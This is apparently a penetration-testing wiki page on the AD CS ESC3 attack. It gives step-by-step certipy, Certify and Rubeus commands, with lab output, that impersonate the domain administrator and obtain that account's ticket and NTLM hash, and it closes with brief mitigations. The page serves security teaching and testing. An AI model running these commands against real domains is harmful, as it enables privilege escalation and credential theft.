# ESC3 ## Description ESC3 attacks make use of certificate templates that have EKU's that allow for "Certificate Request Agent". This EKU enables a principal to request a certificate on behalf of another user. ### Requirements for attack path (1st condition) * Enrolment rights granted to a user or group for which we have access to * Manager approval not enabled * Authorized signatures are not required * Either the certificate EKU is set for "Certificate Request Agent". Or the certificate EKU is set for "Any Purpose" ### Requirements for attack path (2nd condition) Providing the above conditions are met for the certificate template with "Certificate Request Agent" EKU set. The following, second condition set needs to be met on a second template. * Enrolment rights granted to a user or group for which we have access to * Manager approval not enabled * The template defines an EKU which can be used for authentication for example "Client Authentication" * The template schema version is 1 or greater than 2 specifies an Application Policy Issuance Requirement that necessitates the Certificate Request Agent EKU. * No restrictions on enrollment agents are implemented at the CA level. {% hint style="success" %} A likely candidate for the 2nd condition template is the default "User" template. {% endhint %} ## Linux - Enumeration {% code overflow="wrap" %} ```python certipy find -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -enabled -stdout -vulnerable ``` {% endcode %}

## Linux - Performing the attack Perform the initial request to the identified certificate configued with the EKU "Certificate Request Agent". {% code overflow="wrap" %} ```python certipy req -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -ca 'SECURITY-CA-CA' -target-ip 10.10.10.2 -template 'ESC3' -out cert ``` {% endcode %} ``` [+] Generating RSA key [*] Requesting certificate via RPC [+] Trying to connect to endpoint: ncacn_np:10.10.10.2[\pipe\cert] [+] Connected to endpoint: ncacn_np:10.10.10.2[\pipe\cert] [*] Successfully requested certificate [*] Request ID is 16 [*] Got certificate with UPN 'Moe@SECURITY.LOCAL' [*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-1105' [*] Saved certificate and private key to 'cert.pfx' ``` We can request a certificate on behalf of any user using any other template by including the initial certificate as proof. For authentication purposes, it is essential to request a certificate from a template that includes **Client Authentication** in its Extended Key Usage (EKU) settings. {% hint style="warning" %} For accuracy and to avoid certificate mismatch issues we should always aim to provide the -sid parameter which should be the value of the UPN we are targeting ( in the example below). {% endhint %} {% code overflow="wrap" %} ```python certipy req -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -ca 'SECURITY-CA-CA' -target-ip 10.10.10.2 -template 'user' -on-behalf-of 'security\administrator' -sid S-1-5-21-13999771-2333344039-1820745628-500 -pfx cert.pfx ``` {% endcode %} ``` [*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 18 [*] Got certificate with UPN 'administrator@SECURITY.LOCAL' [*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-500' [*] Saved certificate and private key to 'administrator.pfx' ``` Finally, use the certificate file to obtain the user credentials. {% code overflow="wrap" %} ```python certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'security.local' -dc-ip 10.10.10.100 ``` {% endcode %} {% code fullWidth="false" %} ``` [*] Using principal: administrator@security.local [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@security.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bc ``` {% endcode %} ## Windows - Enumeration ```powershell .\Certify.exe find /vulnerable ```

Identify certificates that can be used for client authentication ```powershell .\Certify.exe find /enabled /clientauth ```

## Windows - Performing the attack Request a certificate for the template vulnerable to ESC3. {% code overflow="wrap" %} ```powershell .\Certify.exe request /ca:CA.SECURITY.LOCAL\SECURITY-CA-CA /template:ESC3-P1 ``` {% endcode %} Take the private key and certificate output and place them into seperate files. {% code title="cert.key" %} ``` -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAzyqzlf9NI2sbkAAiJ -----END RSA PRIVATE KEY----- ``` {% endcode %} {% code title="cert.pem" %} ``` -----BEGIN CERTIFICATE----- MIIGeDCCBWCgAwIBAgITIwAAAFhhlVOMQ7 -----END CERTIFICATE----- ``` {% endcode %} Then merge them together with certutil to create a .pfx file. ```powershell certutil -MergePFX .\cert.pem .\cert.pfx ``` We can request a certificate on behalf of any user using any other template by including the initial certificate as proof. For authentication purposes, it is essential to request a certificate from a template that includes **Client Authentication** in its Extended Key Usage (EKU) settings. {% hint style="warning" %} For accuracy and to avoid certificate mismatch issues we should always aim to provide the /sid parameter which should be the value of the UPN we are targeting ( in the example below). {% endhint %} {% code overflow="wrap" %} ```powershell .\Certify.exe request /ca:CA.SECURITY.LOCAL\SECURITY-CA-CA /template:User /onbehalfof:security\Administrator /sid:S-1-5-21-13999771-2333344039-1820745628-500 /enrollcert:cert.pfx ``` {% endcode %} Aagin, take the new key and certificate output and place them into seperate files. {% code title="admin.key" %} ``` -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAzyqzlf9NI2sbkAAiJ -----END RSA PRIVATE KEY----- ``` {% endcode %} {% code title="admin.pem" %} ``` -----BEGIN CERTIFICATE----- MIIGeDCCBWCgAwIBAgITIwAAAFhhlVOMQ7 -----END CERTIFICATE----- ``` {% endcode %} Then merge them together with certutil to create a .pfx file. ```powershell certutil -MergePFX .\admin.pem .\admin.pfx ``` {% code overflow="wrap" %} ```powershell # Get NTLM Hash .\Rubeus.exe asktgt /user:security\Administrator /certificate:admin.pfx /getcredentials # Get TGT .\Rubeus.exe asktgt /user:security\Administrator /certificate:admin.pfx /nowrap ``` {% endcode %} ``` < -- Snip --> ServiceName : krbtgt/security ServiceRealm : SECURITY.LOCAL UserName : Administrator (NT_PRINCIPAL) UserRealm : SECURITY.LOCAL StartTime : 04/03/2025 19:25:09 EndTime : 05/03/2025 05:25:09 RenewTill : 11/03/2025 19:25:09 Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : 30AP07EilJ/mM6LsDioVPw== ASREP (key) : C2E0C2C00D58B05671F7DA68F4D72796 [*] Getting credentials using U2U CredentialInfo : Version : 0 EncryptionType : rc4_hmac CredentialData : CredentialCount : 1 NTLM : 2B576ACBE6BCFDA7294D6BD18041B8FE ``` ## Mitigations * Require manager aprovals on the certificate * Require authorized signatures * Remove weak enrollement permissions from the template * Replace "Any Purpose" (If configured) for a less descriptive one * Use Enrollment Agent restrictions on the Certificate Authority level. For example, you might want to restrict which users are allowed to act as an Enrollment Agent, and which templates can be requested.